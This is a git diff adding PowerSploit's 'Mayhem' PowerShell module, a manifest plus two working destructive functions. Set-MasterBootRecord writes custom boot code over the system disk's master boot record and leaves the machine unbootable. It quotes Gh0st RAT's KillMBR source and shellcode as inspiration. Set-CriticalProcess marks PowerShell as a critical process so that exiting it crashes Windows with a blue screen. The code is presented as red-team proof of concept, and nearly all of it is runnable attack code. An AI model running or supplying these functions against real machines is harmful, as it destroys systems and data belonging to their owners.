diff options
Diffstat (limited to 'Mayhem')
| -rw-r--r-- | Mayhem/Mayhem.psd1 | 87 | ||||
| -rw-r--r-- | Mayhem/Mayhem.psm1 | 366 | 
2 files changed, 453 insertions, 0 deletions
| diff --git a/Mayhem/Mayhem.psd1 b/Mayhem/Mayhem.psd1 index e69de29..82035d8 100644 --- a/Mayhem/Mayhem.psd1 +++ b/Mayhem/Mayhem.psd1 @@ -0,0 +1,87 @@ +@{ + +# Script module or binary module file associated with this manifest. +ModuleToProcess = 'Mayhem.psm1' + +# Version number of this module. +ModuleVersion = '1.0.0.0' + +# ID used to uniquely identify this module +GUID = 'e65b93ff-63ba-4c38-97f1-bc4fe5a6651c' + +# Author of this module +Author = 'Matthew Graeber' + +# Company or vendor of this module +CompanyName = '' + +# Copyright statement for this module +Copyright = 'BSD 3-Clause' + +# Description of the functionality provided by this module +Description = 'PowerSploit Mayhem Module' + +# Minimum version of the Windows PowerShell engine required by this module +PowerShellVersion = '2.0' + +# Name of the Windows PowerShell host required by this module +# PowerShellHostName = '' + +# Minimum version of the Windows PowerShell host required by this module +# PowerShellHostVersion = '' + +# Minimum version of the .NET Framework required by this module +# DotNetFrameworkVersion = '' + +# Minimum version of the common language runtime (CLR) required by this module +# CLRVersion = '' + +# Processor architecture (None, X86, Amd64) required by this module +# ProcessorArchitecture = '' + +# Modules that must be imported into the global environment prior to importing this module +# RequiredModules = @() + +# Assemblies that must be loaded prior to importing this module +# RequiredAssemblies = @() + +# Script files (.ps1) that are run in the caller's environment prior to importing this module. +# ScriptsToProcess = '' + +# Type files (.ps1xml) to be loaded when importing this module +# TypesToProcess = @() + +# Format files (.ps1xml) to be loaded when importing this module +# FormatsToProcess = @() + +# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess +# NestedModules = @() + +# Functions to export from this module +FunctionsToExport = '*' + +# Cmdlets to export from this module +CmdletsToExport = '*' + +# Variables to export from this module +VariablesToExport = '' + +# Aliases to export from this module +AliasesToExport = '' + +# List of all modules packaged with this module. +ModuleList = @(@{ModuleName = 'Mayhem'; ModuleVersion = '1.0.0.0'; GUID = 'e65b93ff-63ba-4c38-97f1-bc4fe5a6651c'}) + +# List of all files packaged with this module +FileList = 'Mayhem.psm1', 'Mayhem.psd1', 'Usage.md' + +# Private data to pass to the module specified in RootModule/ModuleToProcess +# PrivateData = '' + +# HelpInfo URI of this module +# HelpInfoURI = '' + +# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. +# DefaultCommandPrefix = '' + +} diff --git a/Mayhem/Mayhem.psm1 b/Mayhem/Mayhem.psm1 index e69de29..0b4f843 100644 --- a/Mayhem/Mayhem.psm1 +++ b/Mayhem/Mayhem.psm1 @@ -0,0 +1,366 @@ +function Set-MasterBootRecord +{ +<# +.SYNOPSIS + +    Proof of concept code that overwrites the master boot record with the +    message of your choice. + +    PowerSploit Function: Set-MasterBootRecord +    Author: Matthew Graeber (@mattifestation) and Chris Campbell (@obscuresec) +    License: BSD 3-Clause +    Required Dependencies: None +    Optional Dependencies: None +  +.DESCRIPTION + +    Set-MasterBootRecord is proof of concept code designed to show that it is +    possible with PowerShell to overwrite the MBR. This technique was taken +    from a public malware sample. This script is inteded solely as proof of +    concept code. + +.PARAMETER BootMessage + +    Specifies the message that will be displayed upon making your computer a brick. + +.PARAMETER RebootImmediately + +    Reboot the machine immediately upon overwriting the MBR. + +.PARAMETER Force + +    Suppress the warning prompt. + +.EXAMPLE + +    Set-MasterBootRecord -BootMessage 'This is what happens when you fail to defend your network. #CCDC' + +.NOTES + +    Obviously, this will only work if you have a master boot record to +    overwrite. This won't work if you have a GPT (GUID partition table) +#> + +<# +This code was inspired by the Gh0st RAT source code seen here (acquired from: http://webcache.googleusercontent.com/search?q=cache:60uUuXfQF6oJ:read.pudn.com/downloads116/sourcecode/hack/trojan/494574/gh0st3.6_%25E6%25BA%2590%25E4%25BB%25A3%25E7%25A0%2581/gh0st/gh0st.cpp__.htm+&cd=3&hl=en&ct=clnk&gl=us): + +// CGh0stApp message handlers  +  +unsigned char scode[] =  +"\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c"  +"\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72"  +"\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29";  +  +int CGh0stApp::KillMBR()  +{  +	HANDLE hDevice;  +	DWORD dwBytesWritten, dwBytesReturned;  +	BYTE pMBR[512] = {0};  +	  +	// 重新构造MBR  +	memcpy(pMBR, scode, sizeof(scode) - 1);  +	pMBR[510] = 0x55;  +	pMBR[511] = 0xAA;  +	  +	hDevice = CreateFile  +		(  +		"\\\\.\\PHYSICALDRIVE0",  +		GENERIC_READ | GENERIC_WRITE,  +		FILE_SHARE_READ | FILE_SHARE_WRITE,  +		NULL,  +		OPEN_EXISTING,  +		0,  +		NULL  +		);  +	if (hDevice == INVALID_HANDLE_VALUE)  +		return -1;  +	DeviceIoControl  +		(  +		hDevice,   +		FSCTL_LOCK_VOLUME,   +		NULL,   +		0,   +		NULL,   +		0,   +		&dwBytesReturned,   +		NULL  +		);  +	// 写入病毒内容  +	WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);  +	DeviceIoControl  +		(  +		hDevice,   +		FSCTL_UNLOCK_VOLUME,   +		NULL,   +		0,   +		NULL,   +		0,   +		&dwBytesReturned,   +		NULL  +		);  +	CloseHandle(hDevice);  +  +	ExitProcess(-1);  +	return 0;  +}  +#> + +    [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')] Param ( +        [ValidateLength(1, 479)] +        [String] +        $BootMessage = 'Stop-Crying; Get-NewHardDrive', + +        [Switch] +        $RebootImmediately, + +        [Switch] +        $Force +    ) + +    if (!([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]'Administrator')) +    { +        throw 'This script must be executed from an elevated command prompt.' +    } + +    if (!$Force) +    { +        if (!$psCmdlet.ShouldContinue('Do you want to continue?','Set-MasterBootRecord prevent your machine from booting.')) +        { +            return +        } +    } + +    #region define P/Invoke types dynamically +    $DynAssembly = New-Object System.Reflection.AssemblyName('Win32') +    $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run) +    $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('Win32', $False) + +    $TypeBuilder = $ModuleBuilder.DefineType('Win32.Kernel32', 'Public, Class') +    $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String])) +    $SetLastError = [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError') +    $SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, +        @('kernel32.dll'), +        [Reflection.FieldInfo[]]@($SetLastError), +        @($True)) + +    # Define [Win32.Kernel32]::DeviceIoControl +    $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('DeviceIoControl', +        'kernel32.dll', +        ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), +        [Reflection.CallingConventions]::Standard, +        [Bool], +        [Type[]]@([IntPtr], [UInt32], [IntPtr], [UInt32], [IntPtr], [UInt32], [UInt32].MakeByRefType(), [IntPtr]), +        [Runtime.InteropServices.CallingConvention]::Winapi, +        [Runtime.InteropServices.CharSet]::Auto) +    $PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute) + +    # Define [Win32.Kernel32]::CreateFile +    $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('CreateFile', +        'kernel32.dll', +        ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), +        [Reflection.CallingConventions]::Standard, +        [IntPtr], +        [Type[]]@([String], [Int32], [UInt32], [IntPtr], [UInt32], [UInt32], [IntPtr]), +        [Runtime.InteropServices.CallingConvention]::Winapi, +        [Runtime.InteropServices.CharSet]::Ansi) +    $PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute) + +    # Define [Win32.Kernel32]::WriteFile +    $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('WriteFile', +        'kernel32.dll', +        ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), +        [Reflection.CallingConventions]::Standard, +        [Bool], +        [Type[]]@([IntPtr], [IntPtr], [UInt32], [UInt32].MakeByRefType(), [IntPtr]), +        [Runtime.InteropServices.CallingConvention]::Winapi, +        [Runtime.InteropServices.CharSet]::Ansi) +    $PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute) + +    # Define [Win32.Kernel32]::CloseHandle +    $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('CloseHandle', +        'kernel32.dll', +        ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), +        [Reflection.CallingConventions]::Standard, +        [Bool], +        [Type[]]@([IntPtr]), +        [Runtime.InteropServices.CallingConvention]::Winapi, +        [Runtime.InteropServices.CharSet]::Auto) +    $PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute) + +    $Kernel32 = $TypeBuilder.CreateType() +    #endregion + +    $LengthBytes = [BitConverter]::GetBytes(([Int16] ($BootMessage.Length + 5))) +    # Convert the boot message to a byte array +    $MessageBytes = [Text.Encoding]::ASCII.GetBytes(('PS > ' + $BootMessage)) + +    [Byte[]] $MBRInfectionCode = @( +        0xb8, 0x12, 0x00,         # MOV  AX, 0x0012 ; CMD: Set video mode, ARG: text resolution 80x30, pixel resolution 640x480, colors 16/256K, VGA +        0xcd, 0x10,               # INT  0x10       ; BIOS interrupt call - Set video mode +        0xb8, 0x00, 0x0B,         # MOV  AX, 0x0B00 ; CMD: Set background color +        0xbb, 0x01, 0x00,         # MOV  BX, 0x000F ; Background color: Blue +        0xcd, 0x10,               # INT  0x10       ; BIOS interrupt call - Set background color +        0xbd, 0x20, 0x7c,         # MOV  BP, 0x7C18 ; Offset to string: 0x7C00 (base of MBR code) + 0x20 +        0xb9) + $LengthBytes + @( # MOV  CX, 0x0018 ; String length +        0xb8, 0x01, 0x13,         # MOV  AX, 0x1301 ; CMD: Write string, ARG: Assign BL attribute (color) to all characters +        0xbb, 0x0f, 0x00,         # MOV  BX, 0x000F ; Page Num: 0, Color: White +        0xba, 0x00, 0x00,         # MOV  DX, 0x0000 ; Row: 0, Column: 0 +        0xcd, 0x10,               # INT  0x10       ; BIOS interrupt call - Write string +        0xe2, 0xfe                # LOOP 0x16       ; Print all characters to the buffer +        ) + $MessageBytes + +    $MBRSize = [UInt32] 512 + +    if ($MBRInfectionCode.Length -gt ($MBRSize - 2)) +    { +        throw "The size of the MBR infection code cannot exceed $($MBRSize - 2) bytes." +    } + +    # Allocate 512 bytes for the MBR +    $MBRBytes = [Runtime.InteropServices.Marshal]::AllocHGlobal($MBRSize) + +    # Zero-initialize the allocated unmanaged memory +    0..511 | % { [Runtime.InteropServices.Marshal]::WriteByte([IntPtr]::Add($MBRBytes, $_), 0) } + +    [Runtime.InteropServices.Marshal]::Copy($MBRInfectionCode, 0, $MBRBytes, $MBRInfectionCode.Length) + +    # Write boot record signature to the end of the MBR +    [Runtime.InteropServices.Marshal]::WriteByte([IntPtr]::Add($MBRBytes, ($MBRSize - 2)), 0x55) +    [Runtime.InteropServices.Marshal]::WriteByte([IntPtr]::Add($MBRBytes, ($MBRSize - 1)), 0xAA) + +    # Get the device ID of the boot disk +    $DeviceID = Get-WmiObject -Class Win32_DiskDrive -Filter 'Index = 0' | Select-Object -ExpandProperty DeviceID + +    $GENERIC_READWRITE = 0x80000000 -bor 0x40000000 +    $FILE_SHARE_READWRITE = 2 -bor 1 +    $OPEN_EXISTING = 3 + +    # Obtain a read handle to the raw disk +    $DriveHandle = $Kernel32::CreateFile($DeviceID, $GENERIC_READWRITE, $FILE_SHARE_READWRITE, 0, $OPEN_EXISTING, 0, 0) + +    if ($DriveHandle -eq ([IntPtr] 0xFFFFFFFF)) +    { +        throw "Unable to obtain read/write handle to $DeviceID" +    } + +    $BytesReturned = [UInt32] 0 +    $BytesWritten =  [UInt32] 0 +    $FSCTL_LOCK_VOLUME =   0x00090018 +    $FSCTL_UNLOCK_VOLUME = 0x0009001C + +    $null = $Kernel32::DeviceIoControl($DriveHandle, $FSCTL_LOCK_VOLUME, 0, 0, 0, 0, [Ref] $BytesReturned, 0) +    $null = $Kernel32::WriteFile($DriveHandle, $MBRBytes, $MBRSize, [Ref] $BytesWritten, 0) +    $null = $Kernel32::DeviceIoControl($DriveHandle, $FSCTL_UNLOCK_VOLUME, 0, 0, 0, 0, [Ref] $BytesReturned, 0) +    $null = $Kernel32::CloseHandle($DriveHandle) + +    Start-Sleep -Seconds 2 + +    [Runtime.InteropServices.Marshal]::FreeHGlobal($MBRBytes) + +    Write-Verbose 'Master boot record overwritten successfully.' + +    if ($RebootImmediately) +    { +        Restart-Computer -Force +    } +} + +function Set-CriticalProcess +{ +<# +.SYNOPSIS + +Causes your machine to blue screen upon exiting PowerShell. + +PowerSploit Function: Set-CriticalProcess +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +.PARAMETER ExitImmediately + +Immediately exit PowerShell after successfully marking the process as critical. + +.PARAMETER Force + +Set the running PowerShell process as critical without asking for confirmation. + +.EXAMPLE + +Set-CriticalProcess + +.EXAMPLE + +Set-CriticalProcess -ExitImmediately + +.EXAMPLE + +Set-CriticalProcess -Force -Verbose + +#> + +    [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')] Param ( +        [Switch] +        $Force, + +        [Switch] +        $ExitImmediately +    ) + +    if (-not ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) +    { +        throw 'You must run Set-CriticalProcess from an elevated PowerShell prompt.' +    } + +    $Response = $True + +    if (!$Force) +    { +        $Response = $psCmdlet.ShouldContinue('Have you saved all your work?', 'The machine will blue screen when you exit PowerShell.') +    } +     +    if (!$Response) +    { +        return +    } + +    $DynAssembly = New-Object System.Reflection.AssemblyName('BlueScreen') +    $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run) +    $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('BlueScreen', $False) + +    # Define [ntdll]::NtQuerySystemInformation method +    $TypeBuilder = $ModuleBuilder.DefineType('BlueScreen.Win32.ntdll', 'Public, Class') +    $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('NtSetInformationProcess', +                                                        'ntdll.dll', +                                                        ([Reflection.MethodAttributes] 'Public, Static'), +                                                        [Reflection.CallingConventions]::Standard, +                                                        [Int32], +                                                        [Type[]] @([IntPtr], [UInt32], [IntPtr].MakeByRefType(), [UInt32]), +                                                        [Runtime.InteropServices.CallingConvention]::Winapi, +                                                        [Runtime.InteropServices.CharSet]::Auto) + +    $ntdll = $TypeBuilder.CreateType() + +    $ProcHandle = [Diagnostics.Process]::GetCurrentProcess().Handle +    $ReturnPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(4) + +    $ProcessBreakOnTermination = 29 +    $SizeUInt32 = 4 + +    try +    { +        $null = $ntdll::NtSetInformationProcess($ProcHandle, $ProcessBreakOnTermination, [Ref] $ReturnPtr, $SizeUInt32) +    } +    catch +    { +        return +    } + +    Write-Verbose 'PowerShell is now marked as a critical process and will blue screen the machine upon exiting the process.' + +    if ($ExitImmediately) +    { +        Stop-Process -Id $PID +    } +}
\ No newline at end of file |